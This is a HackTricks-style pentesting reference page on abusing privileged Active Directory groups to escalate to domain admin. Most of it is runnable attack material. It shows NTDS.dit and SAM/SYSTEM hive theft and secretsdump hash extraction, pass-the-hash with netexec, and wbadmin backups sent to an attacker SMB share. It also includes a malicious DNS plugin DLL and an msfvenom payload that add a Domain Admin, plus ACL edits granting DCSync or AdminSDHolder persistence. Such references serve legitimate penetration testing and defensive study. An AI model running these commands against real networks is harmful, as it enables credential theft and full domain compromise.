privileged-groups-and-token-privileges.md (20380B)
1 --- 2 title: "Privileged Groups" 3 section: "Windows" 4 sectionSlug: "windows-hardening" 5 sourcePath: "src/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: false 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # Privileged Groups 14 15 ## Well Known groups with administration privileges 16 17 - **Administrators** 18 - **Domain Admins** 19 - **Enterprise Admins** 20 21 ## Account Operators 22 23 This group is empowered to create accounts and groups that are not administrators on the domain. Additionally, it enables local login to the Domain Controller (DC). 24 25 To identify the members of this group, the following command is executed: 26 27 ```bash 28 Get-NetGroupMember -Identity "Account Operators" -Recurse 29 ``` 30 31 Adding new users is permitted, as well as local login to the DC.<sup>[[1]](#references)</sup> 32 33 ## AdminSDHolder group 34 35 The **AdminSDHolder** group's Access Control List (ACL) is crucial as it sets permissions for all "protected groups" within Active Directory, including high-privilege groups. This mechanism ensures the security of these groups by preventing unauthorized modifications. 36 37 An attacker could exploit this by modifying the **AdminSDHolder** group's ACL, granting full permissions to a standard user. This would effectively give that user full control over all protected groups. If this user's permissions are altered or removed, they would be automatically reinstated within an hour due to the system's design.<sup>[[14]](#references)</sup> 38 39 Recent Windows Server documentation still treats several built-in operator groups as **protected** objects (`Account Operators`, `Backup Operators`, `Print Operators`, `Server Operators`, `Domain Admins`, `Enterprise Admins`, `Key Admins`, `Enterprise Key Admins`, etc.). The **SDProp** process runs on the **PDC Emulator** every 60 minutes by default, stamps `adminCount=1`, and disables inheritance on protected objects. This is useful both for persistence and for hunting stale privileged users that were removed from a protected group but still keep the non-inheriting ACL.<sup>[[12]](#references)</sup> 40 41 Commands to review the members and modify permissions include: 42 43 ```bash 44 Get-NetGroupMember -Identity "AdminSDHolder" -Recurse 45 Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -PrincipalIdentity matt -Rights All 46 Get-ObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs | ?{$_.IdentityReference -match 'spotless'} 47 ``` 48 49 ```powershell 50 # Hunt users/groups that still have adminCount=1 51 Get-ADObject -LDAPFilter '(adminCount=1)' -Properties adminCount,distinguishedName | 52 Select-Object distinguishedName 53 ``` 54 55 A script is available to expedite the restoration process: [Invoke-ADSDPropagation.ps1](https://github.com/edemilliere/ADSI/blob/master/Invoke-ADSDPropagation.ps1). 56 57 For more details, visit [ired.team](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/how-to-abuse-and-backdoor-adminsdholder-to-obtain-domain-admin-persistence).<sup>[[14]](#references)</sup> 58 59 ## AD Recycle Bin 60 61 Membership in this group allows for the reading of deleted Active Directory objects, which can reveal sensitive information: 62 63 ```bash 64 Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties * 65 ``` 66 67 This is useful for **recovering previous privilege paths**. Deleted objects can still expose `lastKnownParent`, `memberOf`, `sIDHistory`, `adminCount`, old SPNs, or the DN of a deleted privileged group that can later be restored by another operator. 68 69 ```powershell 70 Get-ADObject -Filter 'isDeleted -eq $true' -IncludeDeletedObjects ` 71 -Properties samAccountName,lastKnownParent,memberOf,sIDHistory,adminCount,servicePrincipalName | 72 Select-Object samAccountName,lastKnownParent,adminCount,sIDHistory,servicePrincipalName 73 ``` 74 75 ### Domain Controller Access 76 77 Access to files on the DC is restricted unless the user is part of the `Server Operators` group, which changes the level of access. 78 79 ### Privilege Escalation 80 81 Using `PsService` or `sc` from Sysinternals, one can inspect and modify service permissions. The `Server Operators` group, for instance, has full control over certain services, allowing for the execution of arbitrary commands and privilege escalation:<sup>[[1]](#references)</sup> 82 83 ```batch 84 C:\> .\PsService.exe security AppReadiness 85 ``` 86 87 This command reveals that `Server Operators` have full access, enabling the manipulation of services for elevated privileges. 88 89 ## Backup Operators 90 91 Membership in the `Backup Operators` group provides access to the `DC01` file system due to the `SeBackup` and `SeRestore` privileges. These privileges enable folder traversal, listing, and file copying capabilities, even without explicit permissions, using the `FILE_FLAG_BACKUP_SEMANTICS` flag. Utilizing specific scripts is necessary for this process.<sup>[[1]](#references)</sup> 92 93 To list group members, execute: 94 95 ```bash 96 Get-NetGroupMember -Identity "Backup Operators" -Recurse 97 ``` 98 99 ### Local Attack 100 101 To leverage these privileges locally, the following steps are employed: 102 103 1. Import necessary libraries: 104 105 ```bash 106 Import-Module .\SeBackupPrivilegeUtils.dll 107 Import-Module .\SeBackupPrivilegeCmdLets.dll 108 ``` 109 110 2. Enable and verify `SeBackupPrivilege`: 111 112 ```bash 113 Set-SeBackupPrivilege 114 Get-SeBackupPrivilege 115 ``` 116 117 3. Access and copy files from restricted directories, for instance: 118 119 ```bash 120 dir C:\Users\Administrator\ 121 Copy-FileSeBackupPrivilege C:\Users\Administrator\report.pdf c:\temp\x.pdf -Overwrite 122 ``` 123 124 ### AD Attack 125 126 Direct access to the Domain Controller's file system allows for the theft of the `NTDS.dit` database, which contains all NTLM hashes for domain users and computers. 127 128 #### Using diskshadow.exe 129 130 1. Create a shadow copy of the `C` drive: 131 132 ```batch 133 diskshadow.exe 134 set verbose on 135 set metadata C:\Windows\Temp\meta.cab 136 set context clientaccessible 137 begin backup 138 add volume C: alias cdrive 139 create 140 expose %cdrive% F: 141 end backup 142 exit 143 ``` 144 145 2. Copy `NTDS.dit` from the shadow copy: 146 147 ```batch 148 Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit C:\Tools\ntds.dit 149 ``` 150 151 Alternatively, use `robocopy` for file copying: 152 153 ```batch 154 robocopy /B F:\Windows\NTDS .\ntds ntds.dit 155 ``` 156 157 3. Extract `SYSTEM` and `SAM` for hash retrieval: 158 159 ```batch 160 reg save HKLM\SYSTEM SYSTEM.SAV 161 reg save HKLM\SAM SAM.SAV 162 ``` 163 164 4. Retrieve all hashes from `NTDS.dit`: 165 166 ```text 167 secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL 168 ``` 169 170 5. Post-extraction: Pass-the-Hash to DA<sup>[[11]](#references)</sup> 171 172 ```bash 173 # Use the recovered Administrator NT hash to authenticate without the cleartext password 174 netexec winrm <DC_FQDN> -u Administrator -H <ADMIN_NT_HASH> -x "whoami" 175 176 # Or execute via SMB using an exec method 177 netexec smb <DC_FQDN> -u Administrator -H <ADMIN_NT_HASH> --exec-method smbexec -x cmd 178 ``` 179 180 #### Using wbadmin.exe 181 182 1. Set up NTFS filesystem for SMB server on attacker machine and cache SMB credentials on the target machine. 183 2. Use `wbadmin.exe` for system backup and `NTDS.dit` extraction: 184 ```cmd 185 net use X: \\<AttackIP>\sharename /user:smbuser password 186 echo "Y" | wbadmin start backup -backuptarget:\\<AttackIP>\sharename -include:c:\windows\ntds 187 wbadmin get versions 188 echo "Y" | wbadmin start recovery -version:<date-time> -itemtype:file -items:c:\windows\ntds\ntds.dit -recoverytarget:C:\ -notrestoreacl 189 ``` 190 191 For a practical demonstration, see [DEMO VIDEO WITH IPPSEC](https://www.youtube.com/watch?v=IfCysW0Od8w&t=2610s). 192 193 ## DnsAdmins 194 195 Members of the **DnsAdmins** group can exploit their privileges to load an arbitrary DLL with SYSTEM privileges on a DNS server, often hosted on Domain Controllers. This capability allows for significant exploitation potential. 196 197 To list members of the DnsAdmins group, use: 198 199 ```bash 200 Get-NetGroupMember -Identity "DnsAdmins" -Recurse 201 ``` 202 203 ### Execute arbitrary DLL (CVE‑2021‑40469) 204 205 > [!NOTE] 206 > This vulnerability allows for the execution of arbitrary code with SYSTEM privileges in the DNS service (usually inside the DCs). This issue was fixed in 2021. 207 208 Members can make the DNS server load an arbitrary DLL (either locally or from a remote share) using commands such as: 209 210 ```bash 211 dnscmd [dc.computername] /config /serverlevelplugindll c:\path\to\DNSAdmin-DLL.dll 212 dnscmd [dc.computername] /config /serverlevelplugindll \\1.2.3.4\share\DNSAdmin-DLL.dll 213 An attacker could modify the DLL to add a user to the Domain Admins group or execute other commands with SYSTEM privileges. Example DLL modification and msfvenom usage: 214 215 # If dnscmd is not installed run from aprivileged PowerShell session: 216 Install-WindowsFeature -Name RSAT-DNS-Server -IncludeManagementTools 217 ``` 218 219 ```c 220 // Modify DLL to add user 221 DWORD WINAPI DnsPluginInitialize(PVOID pDnsAllocateFunction, PVOID pDnsFreeFunction) 222 { 223 system("C:\\Windows\\System32\\net.exe user Hacker T0T4llyrAndOm... /add /domain"); 224 system("C:\\Windows\\System32\\net.exe group \"Domain Admins\" Hacker /add /domain"); 225 } 226 ``` 227 228 ```bash 229 // Generate DLL with msfvenom 230 msfvenom -p windows/x64/exec cmd='net group "domain admins" <username> /add /domain' -f dll -o adduser.dll 231 ``` 232 233 Restarting the DNS service (which may require additional permissions) is necessary for the DLL to be loaded: 234 235 ```csharp 236 sc.exe \\dc01 stop dns 237 sc.exe \\dc01 start dns 238 ``` 239 240 For more details on this attack vector, refer to ired.team. 241 242 #### Mimilib.dll 243 244 It's also feasible to use mimilib.dll for command execution, modifying it to execute specific commands or reverse shells. [Check this post](https://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html) for more information.<sup>[[15]](#references)</sup> 245 246 ### WPAD Record for MitM 247 248 DnsAdmins can manipulate DNS records to perform Man-in-the-Middle (MitM) attacks by creating a WPAD record after disabling the global query block list. Tools like Responder or Inveigh can be used for spoofing and capturing network traffic. 249 250 ### Event Log Readers 251 Members can access event logs, potentially finding sensitive information such as plaintext passwords or command execution details: 252 253 ```bash 254 # Get members and search logs for sensitive information 255 Get-NetGroupMember -Identity "Event Log Readers" -Recurse 256 Get-WinEvent -LogName security | where { $_.ID -eq 4688 -and $_.Properties[8].Value -like '*/user*'} 257 ``` 258 259 ## Exchange Windows Permissions 260 261 This group can modify DACLs on the domain object, potentially granting DCSync privileges. Techniques for privilege escalation exploiting this group are detailed in Exchange-AD-Privesc GitHub repo. 262 263 ```bash 264 # List members 265 Get-NetGroupMember -Identity "Exchange Windows Permissions" -Recurse 266 ``` 267 268 If you can act as a member of this group, the classic abuse is to grant an attacker-controlled principal the replication rights needed for [DCSync](/hacktricks/windows-hardening/active-directory-methodology/dcsync): 269 270 ```bash 271 Add-DomainObjectAcl -TargetIdentity "DC=testlab,DC=local" -PrincipalIdentity attacker -Rights DCSync 272 Get-ObjectAcl -DistinguishedName "DC=testlab,DC=local" -ResolveGUIDs | ?{$_.IdentityReference -match 'attacker'} 273 ``` 274 275 Historically, **PrivExchange** chained mailbox access, coerced Exchange authentication, and LDAP relay to land on this same primitive. Even where that relay path is mitigated, direct membership in `Exchange Windows Permissions` or control of an Exchange server remains a high-value route to domain replication rights. 276 277 ## Hyper-V Administrators 278 279 Hyper-V Administrators have full access to Hyper-V, which can be exploited to gain control over virtualized Domain Controllers. This includes cloning live DCs and extracting NTLM hashes from the NTDS.dit file. 280 281 ### Exploitation Example 282 283 The practical abuse is usually **offline access to DC disks/checkpoints** rather than old host-level LPE tricks. With access to the Hyper-V host, an operator can checkpoint or export a virtualized Domain Controller, mount the VHDX, and extract `NTDS.dit`, `SYSTEM`, and other secrets without touching LSASS inside the guest: 284 285 ```bash 286 # Host-side enumeration 287 Get-VM 288 Get-VHD -VMId <vm-guid> 289 290 # After exporting or checkpointing the DC, mount the disk read-only 291 Mount-VHD -Path 'C:\HyperV\Virtual Hard Disks\DC01.vhdx' -ReadOnly 292 ``` 293 294 From there, reuse the `Backup Operators` workflow to copy `Windows\NTDS\ntds.dit` and the registry hives offline. Related backup-file workflow: 295 296 [Pentesting Veeam Backup And Replication](/hacktricks/network-services-pentesting/pentesting-veeam-backup-and-replication) 297 298 ## Group Policy Creators Owners 299 300 This group allows members to create Group Policies in the domain. However, its members can't apply group policies to users or group or edit existing GPOs. 301 302 The important nuance is that the **creator becomes owner of the new GPO** and usually gets enough rights to edit it afterwards. That means this group is interesting when you can either: 303 304 - create a malicious GPO and convince an admin to link it to a target OU/domain 305 - edit a GPO you created that is already linked somewhere useful 306 - abuse another delegated right that lets you link GPOs, while this group gives you the edit side 307 308 Practical abuse normally means adding an **Immediate Task**, **startup script**, **local admin membership**, or **user rights assignment** change through SYSVOL-backed policy files.<sup>[[3]](#references)[[4]](#references)[[13]](#references)[[16]](#references)</sup> 309 310 ```bash 311 # Example with SharpGPOAbuse: add an immediate task that executes as SYSTEM 312 SharpGPOAbuse.exe --AddImmediateTask --TaskName "HT-Task" --Author TESTLAB\\Administrator --Command "cmd.exe" --Arguments "/c whoami > C:\\Windows\\Temp\\gpo.txt" --GPOName "Security Update" 313 ``` 314 315 If editing the GPO manually through `SYSVOL`, remember the change is not enough by itself: `versionNumber`, `GPT.ini`, and sometimes `gPCMachineExtensionNames` must also be updated or clients will ignore the policy refresh.<sup>[[9]](#references)</sup> 316 317 ## Organization Management 318 319 In environments where **Microsoft Exchange** is deployed, a special group known as **Organization Management** holds significant capabilities. This group is privileged to **access the mailboxes of all domain users** and maintains **full control over the 'Microsoft Exchange Security Groups'** Organizational Unit (OU). This control includes the **`Exchange Windows Permissions`** group, which can be exploited for privilege escalation. 320 321 ### Privilege Exploitation and Commands 322 323 #### Print Operators 324 325 Members of the **Print Operators** group are endowed with several privileges, including the **`SeLoadDriverPrivilege`**, which allows them to **log on locally to a Domain Controller**, shut it down, and manage printers. To exploit these privileges, especially if **`SeLoadDriverPrivilege`** is not visible under an unelevated context, bypassing User Account Control (UAC) is necessary.<sup>[[1]](#references)</sup> 326 327 To list the members of this group, the following PowerShell command is used: 328 329 ```bash 330 Get-NetGroupMember -Identity "Print Operators" -Recurse 331 ``` 332 333 On Domain Controllers this group is dangerous because the default Domain Controller Policy grants **`SeLoadDriverPrivilege`** to `Print Operators`. If you reach an elevated token for a member of this group, you can enable the privilege and load a signed-but-vulnerable driver to jump to kernel/SYSTEM.<sup>[[2]](#references)[[5]](#references)[[6]](#references)[[7]](#references)[[8]](#references)[[10]](#references)[[17]](#references)</sup> For token handling details, check [Access Tokens](/hacktricks/windows-hardening/windows-local-privilege-escalation/access-tokens). 334 335 #### Remote Desktop Users 336 337 This group's members are granted access to PCs via Remote Desktop Protocol (RDP). To enumerate these members, PowerShell commands are available: 338 339 ```bash 340 Get-NetGroupMember -Identity "Remote Desktop Users" -Recurse 341 Get-NetLocalGroupMember -ComputerName <pc name> -GroupName "Remote Desktop Users" 342 ``` 343 344 Further insights into exploiting RDP can be found in dedicated pentesting resources. 345 346 #### Remote Management Users 347 348 Members can access PCs over **Windows Remote Management (WinRM)**. Enumeration of these members is achieved through: 349 350 ```bash 351 Get-NetGroupMember -Identity "Remote Management Users" -Recurse 352 Get-NetLocalGroupMember -ComputerName <pc name> -GroupName "Remote Management Users" 353 ``` 354 355 For exploitation techniques related to **WinRM**, specific documentation should be consulted. 356 357 #### Server Operators 358 359 This group has permissions to perform various configurations on Domain Controllers, including backup and restore privileges, changing system time, and shutting down the system.<sup>[[1]](#references)</sup> To enumerate the members, the command provided is: 360 361 ```bash 362 Get-NetGroupMember -Identity "Server Operators" -Recurse 363 ``` 364 365 On Domain Controllers, `Server Operators` commonly inherit enough rights to **reconfigure or start/stop services** and also receive `SeBackupPrivilege`/`SeRestorePrivilege` through the default DC policy. In practice, this makes them a bridge between **service-control abuse** and **NTDS extraction**: 366 367 ```batch 368 sc.exe \\dc01 query 369 sc.exe \\dc01 qc <service> 370 .\PsService.exe security <service> 371 ``` 372 373 If a service ACL gives this group change/start rights, point the service at an arbitrary command, start it as `LocalSystem`, and then restore the original `binPath`. If service control is locked down, fall back to the `Backup Operators` techniques above to copy `NTDS.dit`. 374 375 ## References 376 377 - [1] [ired.team – Privileged Accounts and Token Privileges](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/privileged-accounts-and-token-privileges) 378 - [2] [Tarlogic – Abusing SeLoadDriverPrivilege for Privilege Escalation](https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/) 379 - [3] [harmj0y – Abusing GPO Permissions](https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/) 380 - [4] [rastamouse – GPO Abuse, Part 1 (Internet Archive)](https://web.archive.org/web/20190416075109/https://rastamouse.me/2019/01/gpo-abuse-part-1/) 381 - [5] [killswitch-GUI – HotLoad-Driver (ntloaddriver.cpp)](https://github.com/killswitch-GUI/HotLoad-Driver/blob/master/NtLoadDriver/EXE/NtLoadDriver-C%2B%2B/ntloaddriver.cpp#L13) 382 - [6] [tandasat – ExploitCapcom](https://github.com/tandasat/ExploitCapcom) 383 - [7] [TarlogicSecurity – EoPLoadDriver (eoploaddriver.cpp)](https://github.com/TarlogicSecurity/EoPLoadDriver/blob/master/eoploaddriver.cpp) 384 - [8] [FuzzySecurity – Capcom-Rootkit (Capcom.sys)](https://github.com/FuzzySecurity/Capcom-Rootkit/blob/master/Driver/Capcom.sys) 385 - [9] [SpecterOps – A Red Teamer's Guide to GPOs and OUs](https://posts.specterops.io/a-red-teamers-guide-to-gpos-and-ous-f0d03976a31e) 386 - [10] [Microsoft Learn – ZwLoadDriver function](https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/wdm/nf-wdm-zwloaddriver) 387 - [11] [HTB: Baby — Anonymous LDAP → Password Spray → SeBackupPrivilege → Domain Admin](https://0xdf.gitlab.io/2025/09/19/htb-baby.html) 388 - [12] [Microsoft Learn – Appendix C: Protected Accounts and Groups in Active Directory](https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/appendix-c--protected-accounts-and-groups-in-active-directory) 389 - [13] [WithSecure Labs – SharpGPOAbuse](https://labs.withsecure.com/tools/sharpgpoabuse) 390 - [14] [ired.team – How to Abuse and Backdoor AdminSDHolder to Obtain Domain Admin Persistence](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/how-to-abuse-and-backdoor-adminsdholder-to-obtain-domain-admin-persistence) 391 - [15] [Lab of a Penetration Tester – Abusing DnsAdmins Privilege for Escalation in Active Directory](https://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html) 392 - [16] [BloodHound – GenericAll edge abuse information](https://bloodhound.specterops.io/resources/edges/generic-all) 393 - [17] [Undocumented NT Internals – NtLoadDriver function (Internet Archive)](https://web.archive.org/web/20200313000124/http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FExecutable%20Images%2FNtLoadDriver.html)